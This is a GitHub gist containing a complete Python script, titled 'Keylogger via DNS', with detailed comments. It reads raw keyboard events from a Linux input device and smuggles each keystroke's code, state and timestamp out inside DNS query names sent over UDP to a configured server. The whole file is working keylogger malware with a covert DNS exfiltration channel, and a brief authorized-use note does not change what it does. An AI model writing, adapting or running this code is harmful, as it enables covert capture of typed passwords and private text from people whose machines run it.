Skip to content

Instantly share code, notes, and snippets.

@OwenChia
Created July 8, 2019 15:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save OwenChia/1fb995ff48b916c269e978bfe9a95c45 to your computer and use it in GitHub Desktop.
Save OwenChia/1fb995ff48b916c269e978bfe9a95c45 to your computer and use it in GitHub Desktop.
Keylogger via DNS, written in pure Python
# -*- coding: utf-8 -*-
import selectors
import socket
from ctypes import BigEndianStructure, Structure, c_int32, c_int64, c_uint16
from enum import IntEnum
from functools import partial
# Input event type that `process` filters for (compared against ev.type).
EV_KEY = 1
# Labels for the `value` field of a key event, wrapped in ANSI escape
# sequences so they are colorized when printed to a terminal.
EV_KEY_VALUE = {0: '\x1b[31mreleased\x1b[0m',
                1: '\x1b[32mdepressed\x1b[0m',
                2: '\x1b[33mrepeated\x1b[0m'}
# Label printed when an event value is not one of the keys above.
EV_KEY_VALUE_UNKNOWN = '\x1b[37;41;5munknown\x1b[0m'
# (host, port) that the DNS query datagrams are sent to.
DNSLOG_SERVER = ('192.168.1.1', 53)
# Domain suffix appended after the data label of every query name.
DNSLOG_DOMAIN = 'example.org'
# Path of the input device file that the script opens and reads events from.
EV_DEVICE = "/dev/input/event0"
class QR(IntEnum):
    '''Values for the one-bit QR flag of the DNS header (RFC 1035).'''
    query = 0     # message is a query
    response = 1  # message is a response
class OPCODE(IntEnum):
    '''Values for the four-bit Opcode field of the DNS header (RFC 1035).'''
    query = 0   # standard query
    iquery = 1  # inverse query
    status = 2  # server status request
class QTYPE(IntEnum):
    '''
    Record type codes usable in the QTYPE field of a DNS question.

    The numeric values correspond to the TYPE/QTYPE tables of RFC 1035.
    '''
    A = 1        # host address
    NS = 2       # authoritative name server
    MD = 3       # mail destination (obsolete)
    MF = 4       # mail forwarder (obsolete)
    CNAME = 5    # canonical name for an alias
    SOA = 6      # start of a zone of authority
    MB = 7       # mailbox domain name
    MG = 8       # mail group member
    MR = 9       # mail rename domain name
    NULL = 10    # null resource record
    WKS = 11     # well known service description
    PTR = 12     # domain name pointer
    HINFO = 13   # host information
    MINFO = 14   # mailbox or mail list information
    MX = 15      # mail exchange
    TXT = 16     # text strings
    # The remaining codes are only valid in questions, not in records.
    AXFR = 252   # request for a transfer of an entire zone
    MAILB = 253  # request for mailbox-related records
    MAILA = 254  # request for mail agent records (obsolete)
    ALL = 255    # request for all records ("*")
class QCLASS(IntEnum):
    '''
    Class codes usable in the QCLASS field of a DNS question.

    The numeric values correspond to the CLASS/QCLASS tables of RFC 1035.
    '''
    IN = 1     # the Internet
    CS = 2     # CSNET (obsolete)
    CH = 3     # CHAOS
    HS = 4     # Hesiod
    ANY = 255  # any class ("*"); only valid in questions
class DNSHeader(BigEndianStructure):
    '''
    DNS message header declared as a big-endian ctypes structure.

    The fields are an ID word, a run of bit fields whose widths add up to
    16 bits (the flags word), and four 16-bit section counts. `bytes()` of
    an instance is what `send_dns_pack` places in front of the question.

    The order and widths of the entries in `_fields_` define the byte
    layout, so they must not be reordered or resized.
    '''
    _fields_ = [('ID', c_uint16),          # identifier chosen by the sender
                # --- flags word: 1 + 4 + 1 + 1 + 1 + 1 + 3 + 4 = 16 bits ---
                ('QR', c_uint16, 1),       # query (0) or response (1), see QR
                ('Opcode', c_uint16, 4),   # kind of query, see OPCODE
                ('AA', c_uint16, 1),       # authoritative answer
                ('TC', c_uint16, 1),       # truncation
                ('RD', c_uint16, 1),       # recursion desired
                ('RA', c_uint16, 1),       # recursion available
                ('Z', c_uint16, 3),        # reserved
                ('RCODE', c_uint16, 4),    # response code
                # --- number of entries in each following section ---
                ('QDCOUNT', c_uint16),     # question section
                ('ANCOUNT', c_uint16),     # answer section
                ('NSCOUNT', c_uint16),     # authority section
                ('ARCOUNT', c_uint16)]     # additional section
class InputEvent(Structure):
    '''
    Native-byte-order ctypes structure for one record read from the input
    device file.

    It is meant to mirror this C layout:

        struct timeval {
            int64_t tv_sec;
            int64_t tv_usec;
        };
        struct input_event {
            struct timeval time;
            uint16 type;
            uint16 code;
            int32 value;
        };

    The nested timeval is flattened into the two `time__*` fields.

    NOTE(review): the 64-bit timeval members presumably assume a 64-bit
    platform -- confirm before relying on this layout elsewhere.
    '''
    _fields_ = [('time__tv_sec', c_int64),   # event timestamp, seconds part
                ('time__tv_usec', c_int64),  # event timestamp, microseconds part
                ('type', c_uint16),          # event type; `process` looks for EV_KEY
                ('code', c_uint16),          # event code (the key, for key events)
                ('value', c_int32)]          # event value; see EV_KEY_VALUE for key events
def dns_question(qname: str, qtype: QTYPE = QTYPE.A, qclass: QCLASS = QCLASS.IN) -> bytes:
    '''
    Encode one entry of a DNS question section.

    The result is the name as a sequence of length-prefixed labels ended by
    a zero byte, followed by the 16-bit big-endian type and class codes.

    Args:
        qname: dotted domain name, e.g. 'www.example.org'. One trailing dot
            is accepted, and '' or '.' encodes the root name.
        qtype: record type being asked for.
        qclass: record class being asked for.

    Returns:
        The encoded question as bytes.

    Raises:
        ValueError: if a label is empty, or is longer than 63 bytes once
            encoded (the largest length a label prefix may carry).
    '''
    # A single trailing dot only marks the root, which the terminating zero
    # byte below already encodes.
    if qname.endswith('.'):
        qname = qname[:-1]
    labels = qname.split('.') if qname else []

    question = []
    for label in labels:
        raw = label.encode()
        # The prefix counts bytes on the wire, not characters, so measure
        # the encoded form; the two differ for non-ASCII text.
        if not 1 <= len(raw) <= 63:
            raise ValueError(
                'DNS label must be 1-63 bytes, got {:d}: {!r}'.format(len(raw), label))
        question.append(bytes([len(raw)]))
        question.append(raw)
    question.append(bytes([0]))
    question.append(qtype.to_bytes(2, byteorder='big'))
    question.append(qclass.to_bytes(2, byteorder='big'))
    return b''.join(question)
def send_dns_pack(data: str, dnsh: DNSHeader) -> None:
    '''
    Send one DNS query whose name is `data` followed by DNSLOG_DOMAIN.

    The datagram is the raw bytes of `dnsh` followed by a single question
    built by `dns_question` with its default type and class. It is sent to
    DNSLOG_SERVER over a UDP socket created for this call.

    The socket is then registered for read events on the module-level
    selector `sel`, with a callback that reads up to 1024 bytes from it.
    Nothing in this function unregisters or closes the socket.

    Args:
        data: text placed in front of DNSLOG_DOMAIN, joined with a dot.
        dnsh: header whose bytes start the datagram.
    '''
    # Query name is "<data>.<DNSLOG_DOMAIN>".
    dnsq = dns_question('.'.join([data, DNSLOG_DOMAIN]))
    pack = bytes(dnsh) + dnsq
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.sendto(pack, DNSLOG_SERVER)
    # The main loop invokes this callback as callback(fileobj, mask) when the
    # socket becomes readable; the received data is not used by the caller.
    sel.register(sock, selectors.EVENT_READ, lambda sock, mask: sock.recvfrom(1024))
def process(fd, mask):
    '''
    Selector callback for the input device file.

    Reads records from `fd` into an InputEvent until one has type EV_KEY,
    prints its timestamp, code and state label separated by tabs, and then
    passes the string "<tv_sec>-<code>-<value>" to the module-level
    `send_dns` callable.

    Args:
        fd: binary file object for the input device, as registered on the
            selector.
        mask: selector event mask; not used.
    '''
    ev = InputEvent()
    fd.readinto(ev)
    # Skip records of any other event type.
    while ev.type != EV_KEY:
        fd.readinto(ev)
    print(ev.time__tv_sec, ev.time__tv_usec, ev.code,
          EV_KEY_VALUE.get(ev.value, EV_KEY_VALUE_UNKNOWN), sep='\t')
    send_dns("{:d}-{:d}-{:d}".format(ev.time__tv_sec, ev.code, ev.value))
# NOTE(review): when run, this script records key events from EV_DEVICE and
# transmits them to DNSLOG_SERVER. Run it only on machines you own or are
# explicitly authorized to test.
if __name__ == '__main__':
    # Header reused for every query: fixed ID, recursion desired, and exactly
    # one entry in the question section.
    dnsh = DNSHeader(ID=0xaaaa,
                     QR=QR.query,
                     Opcode=OPCODE.query,
                     AA=0,
                     TC=0,
                     RD=1,
                     RA=0,
                     Z=0,
                     RCODE=0,
                     QDCOUNT=1,
                     ANCOUNT=0,
                     NSCOUNT=0,
                     ARCOUNT=0)
    # `process` calls this module-level name with just the data string.
    send_dns = partial(send_dns_pack, dnsh=dnsh)
    with open(EV_DEVICE, 'rb') as fd:
        # Module-level selector; `send_dns_pack` also registers its sockets
        # on it.
        sel = selectors.DefaultSelector()
        sel.register(fd, selectors.EVENT_READ, process)
        try:
            while True:
                events = sel.select()
                for key, mask in events:
                    # key.data holds the callback given at registration time.
                    callback = key.data
                    callback(key.fileobj, mask)
        except KeyboardInterrupt:
            # Ctrl-C ends the loop; print a newline before exiting.
            print()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment